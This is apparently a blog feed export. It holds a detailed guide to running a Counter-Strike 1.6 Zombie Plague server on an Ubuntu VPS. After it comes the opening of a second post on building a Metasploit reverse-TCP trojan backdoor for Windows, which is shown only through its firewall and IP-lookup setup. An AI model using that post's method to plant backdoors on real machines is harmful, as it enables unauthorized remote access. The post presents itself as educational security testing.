If you&apos;re considering hosting your own Counter-Strike 1.6 (CS 1.6) server and welcoming players to join your game world, opting for a Virtual Private Server (VPS) is a wise decision. A VPS offers various advantages, such as enhanced security and stability, making it an optimal choice for setting up your CS 1.6 server. This guide will provide you with step-by-step instructions on how to create and manage a CS 1.6 server on a Linux-based VPS running Ubuntu.

## Step 1: Renting a VPS Server

So, you&apos;ve decided to embark on the journey of setting up your own CS 1.6 server, complete with all the exciting mods and features. The first step on this exciting adventure is to secure a Virtual Private Server (VPS) that will become the foundation of your gaming paradise. In this part of the guide, we&apos;ll explore the process of renting a VPS server, ensuring you have the necessary resources to create an unforgettable CS 1.6 experience.

### Why Opt for a VPS Server?

Before we dive into the intricacies of VPS server rental, let&apos;s briefly touch on why a VPS is the preferred choice for hosting your CS 1.6 server. A VPS offers you a dedicated virtual environment, providing the resources and control necessary to create a seamless gaming experience. With the flexibility to choose your server&apos;s specifications and the ability to install custom software, a VPS is the perfect platform for your CS 1.6 ambitions.

### Exploring VPS Providers

To begin your journey, you&apos;ll need to choose a VPS provider that aligns with your preferences and requirements. There are several reputable options to consider, each offering different pricing plans, server locations, and features. Here are a few noteworthy providers to explore:

- **AWS Lightsail:** Amazon Web Services&apos; (AWS) Lightsail offers an intuitive platform for launching and managing VPS instances. With a variety of pre-configured images and easy scaling options, Lightsail is an excellent choice for beginners and experienced users alike.

- **DigitalOcean:** Known for its user-friendly interface and straightforward pricing, DigitalOcean provides a range of VPS solutions tailored to different needs. Whether you&apos;re a gaming enthusiast or a developer, DigitalOcean has options to suit your requirements.

- **Google Cloud:** Google Cloud&apos;s Compute Engine offers high-performance virtual machines that can handle the demands of a CS 1.6 server. With advanced networking features and a global network of data centers, Google Cloud provides a solid foundation for your gaming server.

- **Linode:** Linode is renowned for its reliability and competitive pricing. With a focus on simplicity and performance, Linode&apos;s VPS offerings are designed to meet the needs of various projects, including game servers.

## Step 2: Logging into Your VPS Server

With your VPS server in hand, it&apos;s time to roll up your sleeves and embark on the journey of creating your CS 1.6 gaming paradise. While we won&apos;t delve into the intricacies of VPS security (we&apos;re here to focus on the gaming action!), let&apos;s kick things off by getting you logged into your server.

### Preparing for Server Access

Before we dive into the thrilling world of CS 1.6 setup, you&apos;ll need a secure way to access your VPS. This is where SSH (Secure Shell) comes into play. SSH allows you to connect to your server over a secure channel, ensuring that your actions are encrypted and protected from prying eyes.

Your VPS provider will have detailed documentation on how to access your server using SSH. This documentation will include crucial information like the server&apos;s IP address, username, and hostname. Make sure to have this information at hand before proceeding.

### Logging In with SSH

Now that you&apos;re armed with the necessary information, let&apos;s get you logged into your server using SSH. Here&apos;s how it&apos;s done:

1. **Open a Terminal:** On your local machine, open a terminal. If you&apos;re using a Windows machine, you can use tools like PuTTY or Windows Subsystem for Linux (WSL) to access SSH.

2. **SSH Command:** In the terminal, use the SSH command along with the provided IP address, username, and hostname to initiate the connection. For example:

   ```shell
   ssh root@&lt;ip&gt; -v
   ```

   Replace `&lt;ip&gt;` with the actual IP address of your VPS server. The `-v` flag adds verbosity, giving you more information about the connection process.

3. **Verify Connection:** After entering the command, you&apos;ll be prompted to verify the authenticity of the server&apos;s fingerprint. This is a security measure to ensure you&apos;re connecting to the correct server. Type `yes` to continue.

4. **Enter Password:** If this is your first time connecting, you&apos;ll be prompted to enter the password associated with the specified username (usually `root`). Note that the password won&apos;t be visible as you type it.

5. **Welcome to Your VPS:** Congratulations! If all goes well, you should now be logged into your VPS server. You&apos;ll see a command prompt indicating that you&apos;re ready to start your CS 1.6 adventure.

And there you have it! You&apos;ve successfully logged into your VPS server using SSH, setting the stage for the exciting journey ahead. In the upcoming parts of this guide, we&apos;ll delve into the installation of essential tools and the step-by-step process of setting up your CS 1.6 server, complete with mods and features. Prepare to become the master of your CS 1.6 domain and let the gaming fun begin!

## Step 3: Updating, Upgrading, and Port 22 Access: Laying the Foundation

Now that you&apos;re logged into your VPS server, it&apos;s time to ensure that your system is up to date and that you have the necessary port access to maintain a seamless connection. In this segment, we&apos;ll be using the reliable Ubuntu distribution to guide us through the process. Ubuntu&apos;s stability and performance make it an excellent choice for hosting game servers.

### Updating Your System

Before we get into the nitty-gritty of gaming, let&apos;s make sure your system is fresh and up to date. Run the following commands to update, upgrade, and perform a distribution upgrade on your system:

```shell
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get dist-upgrade -y
```

### Allowing Port 22 Access

Port 22 is the default port for SSH connections, allowing you to securely access your server. To ensure that you don&apos;t lock yourself out of your server on subsequent logins, you need to allow traffic on port 22.

Enter the following command to enable SSH access:

```shell
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
```

With this rule in place, you&apos;re granting permission for SSH traffic to enter through port 22, which means you can log in without any obstacles.

## Step 4: Allowing Server Ports with UFW

Imagine ports as the doorways to your server – they determine what type of traffic is allowed in and out. In this step, we&apos;re going to ensure that the necessary port for your CS 1.6 server is open and ready to receive players. Think of it as inviting gamers into your digital arena.

Previously, we used `iptables` to manage ports, but for simplicity&apos;s sake, we&apos;re introducing `ufw` (Uncomplicated Firewall), a user-friendly alternative. We&apos;re going to allow port 27015 this time, which is a common choice for CS 1.6 servers.

### Installing and Enabling UFW

First things first, let&apos;s install `ufw` and enable it to ensure it starts up automatically after system boot. Allow SSH before enabling it: UFW blocks incoming connections by default, so skipping this step could lock you out of the server:

```shell
sudo apt-get install ufw -y
sudo ufw allow ssh
sudo ufw enable
```

### Allowing Port 27015

Now, let&apos;s grant access to port 27015, which is a common UDP port used by CS 1.6 servers:

```shell
sudo ufw allow 27015/udp
```

## Step 5: Installing SteamCMD

SteamCMD is a command-line tool for generating game server files. It allows you to download and update game server files from Steam&apos;s content distribution system. In this step, we&apos;ll install SteamCMD, which is essential for setting up and maintaining your CS 1.6 server.

To get started, follow these instructions (assuming you&apos;re using Ubuntu):

1. **Adding the Multiverse Repository**:

   Multiverse is an Ubuntu repository that contains software packages that aren&apos;t officially supported by Canonical but are still maintained by the community. To add the Multiverse repository, run:

   ```shell
   sudo add-apt-repository multiverse
   ```

2. **Installing Required Packages**:

   Before installing SteamCMD, let&apos;s make sure your system is ready. Install the necessary packages using the following commands:

   ```shell
   sudo apt install software-properties-common -y
   sudo dpkg --add-architecture i386
   sudo apt update -y
   ```

3. **Installing SteamCMD**:

   With the prerequisites in place, you&apos;re ready to install SteamCMD:

   ```shell
   sudo apt install lib32gcc-s1 -y
   sudo apt install steamcmd -y
   ```

## Step 6: Installing Game Server Required Files

Your CS 1.6 server needs the necessary game files to function properly. In this step, we&apos;ll use SteamCMD to download and install these files.

1. **Open SteamCMD**:

   Launch SteamCMD by entering the following command in your terminal:

   ```shell
   steamcmd
   ```

2. **Login with anonymous**:

   Once SteamCMD is running, log in as an anonymous user with:

   ```shell
   login anonymous
   ```

3. **Install CS 1.6 Server Files**:

   Now that you&apos;re logged in, it&apos;s time to download and install the CS 1.6 server files. Enter the following commands:

   ```shell
   app_update 90 validate
   ```

   The number `90` corresponds to the CS 1.6 game ID. The `validate` parameter ensures that the files are validated and correctly installed.
   &gt;Notes: You might encounter an error the first time you try to run `app_update 90 validate`. Don&apos;t worry, this is a common issue with SteamCMD. Simply try the `app_update 90 validate` command again, and it should work fine.

4. **Exit SteamCMD**:

   Once the server files are downloaded and installed, you can exit SteamCMD by typing:

   ```shell
   exit
   ```
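
The interactive steps above can also be scripted: SteamCMD runs commands from a file via `+runscript`. A sketch, assuming `steamcmd` is on your PATH and that the script name `update_cs.txt` is just a suggestion:

```shell
# Write the SteamCMD commands from steps 2-4 into a script file
printf 'login anonymous\napp_update 90 validate\nquit\n' | tee update_cs.txt
# steamcmd +runscript update_cs.txt   # uncomment on the server to update unattended
```

This is handy for scheduled updates, since no interactive session is needed.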

## Step 7: Testing the Server

Now, your CS 1.6 server is set up with the basic game files. However, before you can dive into the action, you need to start the server and ensure everything is running as expected. Let&apos;s put your server to the test!

1. **Navigate to the Server Directory**:

   The CS 1.6 server files are located in the following directory:

   ```shell
   ~/.steam/steamapps/common/Half-Life/
   ```

   Use the `cd` command to navigate to this directory:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/
   ```

2. **Start the Server**:

   With the server files directory as your current location, use the following command to start the CS 1.6 server:

   ```shell
   screen -dmS hlds ./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure
   ```

   Let&apos;s break down the components of this command:

   - `-dmS hlds`: This portion of the command sets up a detached screen session named `hlds` for the server process.
   - `./hlds_run`: This command starts the server program.
   - `-game cstrike`: Specifies that the game being run is Counter-Strike 1.6.
   - `+map de_dust2`: Specifies the initial map to load, in this case, `de_dust2`.
   - `-port 27015`: Sets the server&apos;s port to 27015.
   - `+maxplayers 32`: Limits the maximum number of players in a game to 32.
   - `-insecure`: Disables Valve Anti-Cheat (VAC) for now.

3. **Access Your Server**:

   Once the server is running, it&apos;s time to see the fruits of your labor. Launch Counter-Strike 1.6 on your client machine. In the game&apos;s console, press the tilde key (`~`) to open the console and enter the following command:

   ```shell
   connect &lt;your_server_ip&gt;:27015
   ```

   Replace `&lt;your_server_ip&gt;` with the actual IP address of your VPS.

   Alternatively, you can search for your server in the server list within the game and connect from there.

4. **Detaching and Managing the Server**:

   To leave the server running in the background while you exit the terminal, press `Ctrl+A` followed by `Ctrl+D`. This will detach the screen session without stopping the server.

   If you want to return to the server console at any time, use the following command:

   ```shell
   screen -r hlds
   ```
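
The stop/start dance above can be wrapped in a small helper so you don&apos;t retype the full command each time. A sketch (the session name and flags mirror the command above; the file name `restart_hlds.sh` is just a suggestion):

```shell
#!/bin/sh
# restart_hlds.sh - quit any old "hlds" screen session, then start a fresh server
SESSION=hlds
SERVER_DIR="$HOME/.steam/steamapps/common/Half-Life"
START_CMD="./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure"
screen -S "$SESSION" -X quit || true   # ignore the error when no old session exists
echo "starting in $SERVER_DIR: $START_CMD" | tee restart_cmd.log
# On the server, uncomment the next two lines:
# cd "$SERVER_DIR"
# screen -dmS "$SESSION" $START_CMD
```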

With your server up and running, you&apos;ve accomplished a major part of the setup process. In the next steps, we&apos;ll dive deeper into configuring your server and adding plugins to make it the ultimate CS 1.6 Zombie Plague experience!

## Step 8: Download Required Files for AMXXModX and Metamod

To enhance your CS 1.6 server with additional features and functionalities, you&apos;ll need to install AMXXModX (Advanced Multi-Mod X) and Metamod. These plugins will allow you to create and add custom game modes, plugins, and more. Let&apos;s get started by downloading the necessary files.

&gt;Notes: Stick with the exact versions below, because AMXX is almost never updated. It&apos;s a pity, but few people still play 1.6, and the most stable release remains 1.8.2.

1. **Download AMXXModX Base Files**:

   Use the `wget` command to download the base files of AMXXModX version 1.8.2:

   ```shell
   wget https://www.amxmodx.org/release/amxmodx-1.8.2-base-linux.tar.gz
   ```

2. **Download AMXXModX Addon Files**:

   Similarly, download the addon files for AMXXModX version 1.8.2. This step is important for CS 1.6 servers as it provides compatibility with Counter-Strike:

   ```shell
   wget https://www.amxmodx.org/release/amxmodx-1.8.2-cstrike-linux.tar.gz
   ```

3. **Download Metamod Files**:

   Next, let&apos;s download Metamod version 1.21.1, which acts as a plugin management system for Half-Life mods like AMXXModX:

   ```shell
   wget https://www.amxmodx.org/release/metamod-1.21.1-am.zip
   ```

## Step 9: Extract and Install AMXXModX and Metamod Files

Now that you have downloaded the necessary files for AMXXModX and Metamod, let&apos;s proceed to extract and install them. Follow these steps carefully to ensure a successful installation:

&gt;Attention: The extraction order matters: `base` &gt; `addon` &gt; `metamod`. Extract the base archive first, then the addon archive (which overlays it), and Metamod last.

1. **Extract AMXXModX Base Files**:

   First, extract the base files of AMXXModX using the following command:

   ```shell
   tar zxvf amxmodx-1.8.2-base-linux.tar.gz
   ```

2. **Extract AMXXModX Addon Files**:

   Next, extract the addon files for AMXXModX that are specific to Counter-Strike using the command:

   ```shell
   tar zxvf amxmodx-1.8.2-cstrike-linux.tar.gz
   ```

3. **Extract Metamod Files**:

   Unzip the Metamod files using the command:

   ```shell
   unzip metamod-1.21.1-am.zip
   ```

4. **Install AMXXModX**:

   After extracting the files, navigate to the AMXXModX `addons` directory that was created. Use the `cp` command to copy the extracted `addons` directory into the appropriate location for your CS 1.6 server:

   ```shell
   cp -r addons/ ~/.steam/steamapps/common/Half-Life/cstrike/
   ```

## Step 10: Edit and Create Configuration Files

Now, follow these steps to make the necessary changes and create the new configuration files:

1. **Modify liblist.gam**:

   The `liblist.gam` file contains crucial information about the game&apos;s libraries. Open the file using the `nano` text editor:

   ```shell
   nano ~/.steam/steamapps/common/Half-Life/cstrike/liblist.gam
   ```

   Inside the file, locate the line that starts with `gamedll_linux` and change it to:

   ```shell
   gamedll_linux "addons/metamod/dlls/metamod.so"
   ```

   After making the change, press `Ctrl + S` to save and then `Ctrl + X` to exit the `nano` editor.

2. **Create plugins.ini**:

   Next, create a new configuration file called `plugins.ini` under the `addons/metamod` directory:

   ```shell
   nano ~/.steam/steamapps/common/Half-Life/cstrike/addons/metamod/plugins.ini
   ```

   In the newly created file, add the following line:

   ```shell
   linux addons/amxmodx/dlls/amxmodx_mm_i386.so
   ```

   Once again, press `Ctrl + S` to save and then `Ctrl + X` to exit the `nano` editor.
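
   Both edits can also be applied non-interactively, which is useful when provisioning a server from a script. A sketch, run from the `cstrike/` directory; the `printf` line below stands in for the stock `liblist.gam`, whose original `gamedll_linux` value is an assumption here:

   ```shell
   # Stand-in for the stock liblist.gam (on a real server the file already exists)
   printf 'game "cstrike"\ngamedll_linux "dlls/cs.so"\n' | tee liblist.gam
   # Point the engine at Metamod instead of the stock game library
   sed -i 's|^gamedll_linux .*|gamedll_linux "addons/metamod/dlls/metamod.so"|' liblist.gam
   # Create plugins.ini so Metamod loads AMXXModX
   mkdir -p addons/metamod
   printf 'linux addons/amxmodx/dlls/amxmodx_mm_i386.so\n' | tee addons/metamod/plugins.ini
   grep gamedll_linux liblist.gam
   ```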

## Step 11: Testing Your Server (AMXX Installation Verification)

Before proceeding to the next step of installing Zombie Plague, let&apos;s ensure that your game server is up and running with AMXX installed correctly.

1. Restart Your Server:
   Restart your game server using the `screen` command:

   ```shell
   screen -r hlds
   ```

   Press `Ctrl+C` to stop the running server.

2. Start the Server:
   Navigate to the server directory:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/
   ```

   Initiate the server with the following command:

   ```shell
   screen -dmS hlds ./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure
   ```

3. Verify AMXX and Metamod:
   Access the server console:

   ```shell
   screen -r hlds
   ```

   Type the following commands to see if the plugins are properly loaded:

   ```shell
   meta list # Should list 3 plugins
   amxx list # Should list 21 plugins
   ```

   If the results display a list of plugins, you&apos;re on the right track.

## Step 12: Installing the Zombie Plague Mod

Prepare to infuse the Zombie Plague mod into your CS 1.6 server. Follow these steps meticulously for a seamless installation:

1. **Obtaining the Zombie Plague Mod:**

   Introduce the captivating zombie apocalypse gameplay of Zombie Plague to CS 1.6. Obtain the necessary mod files from the following links:

   - [Zombie Plague 2014 Version](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=164926) (Download the SMA files from here)
   - [Zombie Plague 2008 Version](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=72505) (Download the resource files from here)

2. **Downloading the Files:**

   Download the mod files directly to your server using the `wget` command. Execute these commands to fetch the essential resources and plugins:

   ```shell
   wget "https://forums.alliedmods.net/attachment.php?attachmentid=136034&amp;d=1412085945" -O zp_resources.zip
   wget "https://forums.alliedmods.net/attachment.php?s=46bcb4236bef6c971e41f8e763a94c24&amp;attachmentid=28817&amp;d=1216059497" -O zp_plugins.zip
   ```

   These commands retrieve the required files and save them as `zp_resources.zip` and `zp_plugins.zip`.

3. **Unzipping the Files:**

   Create a dedicated folder for extracted files to keep things organized:

   ```shell
   mkdir zp_files
   ```

   Unzip the downloaded files into this new folder:

   ```shell
   cd zp_files
   unzip ../zp_resources.zip
   unzip ../zp_plugins.zip
   ```

   `unzip` lists each file as it extracts, so you can confirm everything unpacked correctly. (Note that `unzip -v` only lists an archive&apos;s contents without extracting.)

4. **Copying Files to the `cstrike/` Directory:**

   Transfer all the extracted files to the `cstrike` directory, where your CS 1.6 server files are located:

   ```shell
   cp -rv * ~/.steam/steamapps/common/Half-Life/cstrike/
   ```

   This command copies all files and directories from the `zp_files` folder to the `cstrike` directory.

5. **Compiling SMA Files:**

   Move to the scripting directory for AMX Mod X:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/cstrike/addons/amxmodx/scripting
   ```

   This directory houses the scripts for plugins.

   Compile the scripts using the provided compilation script:

   ```shell
   ./compile.sh
   ```

   This command compiles the scripts into executable plugin files.

6. **Copying Compiled Plugin Files:**

   After compiling the scripts, navigate to the `compiled` directory, where the compiled plugin files are stored:

   ```shell
   cd compiled
   ```

   Copy the compiled AMXX files to the plugins directory:

   ```shell
   cp -v *.amxx ../../plugins/
   ```

   This command moves the compiled plugin files from the `compiled` directory to the correct location within the `plugins` directory, allowing AMX Mod X to properly load and utilize them.

## Step 13: Testing your Server (Zombie Plague Installation Verification)

Now that you&apos;ve successfully installed the Zombie Plague mod on your CS 1.6 server, it&apos;s time to verify the installation and ensure that everything is working as expected.

1. **Restart Your Server:**
   Begin by restarting your CS 1.6 server using the `screen` command. This step ensures that any previous server instances are closed and prepares the environment for the Zombie Plague mod.

   ```shell
   screen -r hlds
   ```

   If the server is currently running, press Ctrl+C to halt it.

2. **Start the Server with Zombie Plague Mod:**
   To enable the Zombie Plague mod on your server, navigate to the server directory using the following command:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/
   ```

   Now, initiate the server with the Zombie Plague mod activated by executing the following command:

   ```shell
   screen -dmS hlds ./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure
   ```

   To access the server console and monitor its activity, use the command:

   ```shell
   screen -r hlds
   ```

   If you wish to temporarily exit the screen session without stopping the server, press Ctrl+A and then press D.

3. **Check if Zombie Plague Mod is Active:**
   Return to the screen session where your server is running:

   ```shell
   screen -r hlds
   ```

   Confirm that the Zombie Plague mod has been successfully integrated into the server by using the following command:

   ```shell
   amxx list
   ```

   This command displays a list of loaded plugins, including Zombie Plague if it&apos;s properly configured. Verify that Zombie Plague is among the listed plugins, indicating its successful installation.

4. **Join Your Zombie Plague Server:**
   It&apos;s time to experience the thrill of the Zombie Plague gameplay mode you&apos;ve just installed. Launch Counter-Strike 1.6 and access the game&apos;s console by pressing the backtick (`) key.

   **Way 1: Command line:** To join your Zombie Plague server, type the following command in the console, replacing `your_server_ip` with your server&apos;s IP address and `port` with the configured port number:

   ```shell
   connect your_server_ip:port
   ```

   **Way 2: GUI:** Alternatively, you can connect by adding your server&apos;s IP to the server list within the game interface.

   When you successfully join the server, you should be greeted with a gameplay experience similar to the following image:

   ![Zombie Plague Gameplay](./zombie_plague_gameplay.png)

## Step 14: Adding Yapb Bot to Your Zombie Plague Server

Congratulations on successfully installing Zombie Plague on your server! However, playing alone on your server might not be as exciting as having other players. In this final step, we&apos;ll show you how to add Yapb bot to your Zombie Plague server using the bot&apos;s source code.

1. **Install Required Packages:**
   First, navigate to your home directory and install the necessary packages:

   ```shell
   cd ~
   sudo apt update
   sudo apt install build-essential git clang python3 gcc-multilib g++-multilib meson ninja-build
   ```

   These packages provide the tools and libraries needed to compile and configure the Yapb bot.

2. **Clone the Yapb Repository:**
   Clone the Yapb bot&apos;s repository, including its submodules:

   ```shell
   git clone --recursive https://github.com/yapb/yapb
   ```

3. **Navigate to the Yapb Directory:**
   Move into the Yapb bot&apos;s directory:

   ```shell
   cd yapb
   ```

4. **Configure the Project Using Meson:**
   Set up the project configuration using Meson:

   ```shell
   meson setup build
   ```

5. **Compile the .so Library:**
   Compile the bot&apos;s .so library:

   ```shell
   meson compile -C build
   ```

6. **Copy Compiled Files to addons/yapb/bin/:**
   Copy the compiled `yapb.so` library to the `addons/yapb/bin/` directory:

   ```shell
   mkdir -pv ~/.steam/steamapps/common/Half-Life/cstrike/addons/yapb/bin/
   cp -v build/yapb/yapb.so ~/.steam/steamapps/common/Half-Life/cstrike/addons/yapb/bin/
   ```

7. **Modify plugins.ini:**
   Open the `plugins.ini` file using a text editor:

   ```shell
   nano ~/.steam/steamapps/common/Half-Life/cstrike/addons/metamod/plugins.ini
   ```

   Append the following entry to the file:

   ```shell
   linux addons/yapb/bin/yapb.so
   ```

8. **Save and Apply Changes:**
   Save the changes you made to the `plugins.ini` file. This entry ensures that the Yapb bot will be loaded and integrated into your Zombie Plague server when it starts.
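
   Steps 7-8 can be scripted too; a sketch that appends the entry only if it isn&apos;t already present (the `printf` line stands in for the existing file, and the local `plugins.ini` path is a placeholder for the real one under `addons/metamod/`):

   ```shell
   PLUGINS_INI=plugins.ini   # on the server: addons/metamod/plugins.ini
   printf 'linux addons/amxmodx/dlls/amxmodx_mm_i386.so\n' | tee "$PLUGINS_INI"   # stand-in contents
   ENTRY='linux addons/yapb/bin/yapb.so'
   # Append only when an exact matching line is not already there (idempotent)
   grep -qxF "$ENTRY" "$PLUGINS_INI" || echo "$ENTRY" | tee -a "$PLUGINS_INI"
   cat "$PLUGINS_INI"
   ```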

## HTTP Download vs. Server Download: Which Is Faster?

When setting up FastDL for your Counter-Strike 1.6 server, you have the option to allow players to download directly from an HTTP source or from your game server. It&apos;s important to consider the speed and efficiency of these methods.

**HTTP Download:**

   - FastDL resources accessed via HTTP URLs are typically faster for players to download. Players connect to the FastDL server directly, which can result in quicker download times, especially for large files like maps and custom sounds.

**Server Download:**

   - When custom content is downloaded directly from your game server, it might take longer, especially if multiple players are simultaneously connecting and downloading resources. This method can lead to slower download speeds and potential delays for players.

To ensure the best gaming experience for your players, it&apos;s recommended to set up FastDL with HTTP download support. This way, your custom content will be readily available for players to download at optimal speeds.

## Installing a Web Server for FastDL

To host your FastDL resources via HTTP, you&apos;ll need a web server. You can choose between popular options like Apache or Nginx. Here&apos;s how to install them.

&gt; Notes: Just choose one HTTP server. If you want more customization later on, I recommend Nginx.

**Installing Apache:**

1. Open your terminal.

2. Run the following command to install Apache:

   ```shell
   sudo apt-get install apache2 -y
   ```

3. **Enabling Apache Service:** After installing Apache, you&apos;ll need to enable and start the service. Use the following commands:

   ```shell
   sudo systemctl enable apache2   # Enable Apache service to start on boot
   sudo systemctl start apache2    # Start Apache service
   ```

4. Once installed, Apache&apos;s server files are located in the `/var/www/html/` directory.

**Installing Nginx:**

1. Open your terminal.

2. Run the following command to install Nginx:

   ```shell
   sudo apt-get install nginx -y
   ```

3. **Enabling Nginx Service:** Similarly, for Nginx, you&apos;ll need to enable and start the service:

   ```shell
   sudo systemctl enable nginx   # Enable Nginx service to start on boot
   sudo systemctl start nginx    # Start Nginx service
   ```

4. Once installed, Nginx&apos;s server files are also located in the `/var/www/html/` directory.

Enabling the service ensures that your web server will automatically start when your system boots up, making your FastDL resources accessible to players connecting to your Counter-Strike 1.6 server.
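
If you chose Nginx, the default site already serves `/var/www/html`. For a dedicated FastDL host, a minimal server block might look like this (a sketch; the domain `download.yourserver.io` and the stock package layout are assumptions):

```nginx
server {
    listen 80;                            # CS 1.6 clients only speak plain HTTP
    server_name download.yourserver.io;   # hypothetical FastDL domain
    root /var/www/html;
    autoindex off;                        # avoid exposing a full directory listing
}
```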

## Configuring Your Server for FastDL

To enable FastDL on your Counter-Strike 1.6 server, you&apos;ll need to configure the `server.cfg` file. Here are the steps:

1. Locate your `server.cfg` file. You can usually find it in the following directory:
   ```shell
   ~/.steam/steamapps/common/Half-Life/cstrike/server.cfg
   ```

2. Open `server.cfg` using a text editor of your choice.

3. Add the following line to the file, replacing `http://your-fastdl-server.com/` with the actual URL of your FastDL server directory:

   ```shell
   sv_downloadurl "http://your-fastdl-server.com/"
   ```

   This line tells your Counter-Strike 1.6 server to use the specified URL for downloading custom content.

4. Save the changes to the `server.cfg` file.

5. Put all your resource files in `/var/www/html/`. Be sure to match the directory layout, otherwise the files will not be downloaded.

6. Restart your server.

Now, when players connect to your Counter-Strike 1.6 server, the game will automatically fetch custom content from your FastDL server, enhancing their gaming experience.
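
One detail worth spelling out: the paths under your FastDL web root must mirror the paths under `cstrike/` (for example, `maps/de_dust2.bsp` on both sides). A sketch of the mirroring step; the folder list is an assumption, so adjust it to the content you actually ship:

```shell
SRC="$HOME/.steam/steamapps/common/Half-Life/cstrike"   # game directory
DEST="/var/www/html"                                    # web root
for d in maps models sound sprites; do
  echo "mirror $SRC/$d to $DEST/$d" | tee -a fastdl_mirror.log
  # mkdir -p "$DEST/$d"; cp -rv "$SRC/$d/." "$DEST/$d/"   # uncomment on the server
done
```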

### Additionally

You can access your FastDL server&apos;s files via a web browser using the following format:

```shell
http://your-fastdl-server.com/
```

This URL lets you verify and organize the FastDL resources for your server.

## **Important Note for Counter-Strike 1.6 Server Owners**

If you&apos;re a Counter-Strike 1.6 server owner considering the use of a custom domain through Cloudflare, there&apos;s a crucial aspect to keep in mind. Counter-Strike 1.6 does not support HTTPS (TLS) connections, which is essential to understand when working with custom domains and Cloudflare.

Here&apos;s what you need to know:

**1. HTTPS (TLS) Not Supported:** Counter-Strike 1.6 relies on plain HTTP connections, not HTTPS (TLS). This means that when players connect to your server, it happens over an unencrypted HTTP connection.

**2. Cloudflare&apos;s Proxy Service:** Cloudflare provides a proxy service that, by default, routes traffic through its servers. This can enable HTTPS for your domain, but it also means that all traffic is converted to HTTPS.

**3. Non-Proxy (DNS Only) Status:** To ensure that players can connect to your Counter-Strike 1.6 server, you must set the custom domain to `DNS Only` status in Cloudflare. This configuration will route the traffic directly to your server without going through Cloudflare&apos;s proxy servers. This is crucial because, as mentioned, CS 1.6 doesn&apos;t support HTTPS, and forcing HTTPS through Cloudflare will result in connection issues.

**4. Maintaining Server Connectivity:** By setting your custom domain to `DNS Only` status in Cloudflare, you ensure that players can connect to your Counter-Strike 1.6 server without any encryption-related problems. This maintains the compatibility required for a seamless gaming experience.

It&apos;s essential to follow these steps to guarantee that your custom domain and Cloudflare setup don&apos;t interfere with the connectivity of your Counter-Strike 1.6 server. By prioritizing non-proxy (DNS only) status, you&apos;ll ensure that players can effortlessly join your server without encountering any obstacles related to HTTPS compatibility.

### DNS Record Configuration for Your Domain

When configuring the DNS record for your domain in Cloudflare, it&apos;s crucial to set it to `DNS Only`. This ensures that your domain does not go through Cloudflare&apos;s proxy service, allowing you to maintain compatibility with services like Counter-Strike 1.6 that rely on plain HTTP connections.

**DNS Only (No Proxy):** For your domain&apos;s DNS record, select the option that specifies `DNS Only` or `No Proxy`. This configuration ensures that traffic to your domain goes directly to your server without being routed through Cloudflare&apos;s proxy servers.

While your DNS record remains `DNS Only`, you can still use HTTPS within your HTTP server for secure connections. This means that when someone accesses your website using HTTPS in their browser, your server can deliver content securely over HTTPS. However, it&apos;s important to note that your game server, like Counter-Strike 1.6, will continue to use HTTP for resource downloads.

By configuring your DNS record in this way, you strike a balance between maintaining compatibility with older services like Counter-Strike 1.6 and providing secure HTTPS access to your website for modern browsers. This setup allows you to ensure smooth connectivity for all users while keeping your resources accessible via HTTP for older systems.

## Conclusion

Congratulations! You&apos;ve successfully transformed your Counter-Strike 1.6 server into an exciting Zombie Plague server, complete with AI-controlled YaPB bots and FastDL serving your server resources over HTTP.

Now, you can access your server with your custom domain, such as `cs.yourserver.io` or `download.yourserver.io`. Happy gaming!

## References

- [SteamCMD](https://developer.valvesoftware.com/wiki/SteamCMD#Debian-Based_Distributions_.28Ubuntu.2C_Mint.2C_etc..29)
- [Zombie Plague Mod 5.0](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=72505)
- [ZP 5.0 Betas/Updates](https://forums.alliedmods.net/showthread.php?s=d63394212992e827c6577de504a895bc&amp;t=164926)
- [Official YaPB Documentation](https://yapb.readthedocs.io/en/latest/building.html)
- [Github - YaPB](https://github.com/yapb/yapb)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Creating a Trojan Backdoor with Reverse TCP Payload in Metasploit and Setting Up World-wide Access for Windows Machines</title><link>https://ummit.dev//posts/infosec/metasploit/reverse_tcp-shell-metasploit-trojan/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/metasploit/reverse_tcp-shell-metasploit-trojan/</guid><description>Educational guide to creating reverse TCP backdoors with Metasploit framework for security testing and penetration analysis.</description><pubDate>Sun, 27 Jun 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction

Metasploit is best known as a tool for testing exploits and vulnerabilities, but it can also be used to create backdoors and trojans. In this guide, we will create a trojan backdoor with a reverse TCP payload in Metasploit. We will also set up world-wide access to the backdoor program.

## Disclaimer

***This article is for educational purposes only. Please use this knowledge responsibly. Unauthorized access to systems is illegal and unethical. The methods here are used for legitimate recovery and testing, not for illegal activities.***

## Prerequisites

A brain and a computer. You should have an understanding of how to use the command line and Metasploit. ***Again, this guide is for educational purposes only. Script kiddies, please don&apos;t use this for illegal activities.***

## Install Required Packages

Download and install the packages that optimize our process and make it easier to set up the server.

```bash
sudo apt update
sudo apt install curl ufw screen apache2 metasploit-framework --yes
```

## Setting Up World-wide Access

We will use `ufw` to set up the firewall. `ufw` is disabled by default, so we need to enable it. It will warn you that connections may be dropped, but you can ignore this and continue by typing `y`.

Enable `ufw`:
```bash
sudo ufw enable
```

### Allow Specific Ports

Using TCP Protocol, we will demonstrate with port 5555:

```bash
sudo ufw allow 5555/tcp
```

### Check Current IP Address

To generate the trojan, we need to know the current host&apos;s IP address. Use the following command to check:
```bash
curl ifconfig.me
```

Alternatively, use `hostname -i`, keeping in mind that it prints the address bound to the machine itself, so it only matches your public IP if that IP is assigned directly to the server:

```bash
hostname -i
```

Copy the IP address and proceed to the next step.

## Generate the Backdoor Program

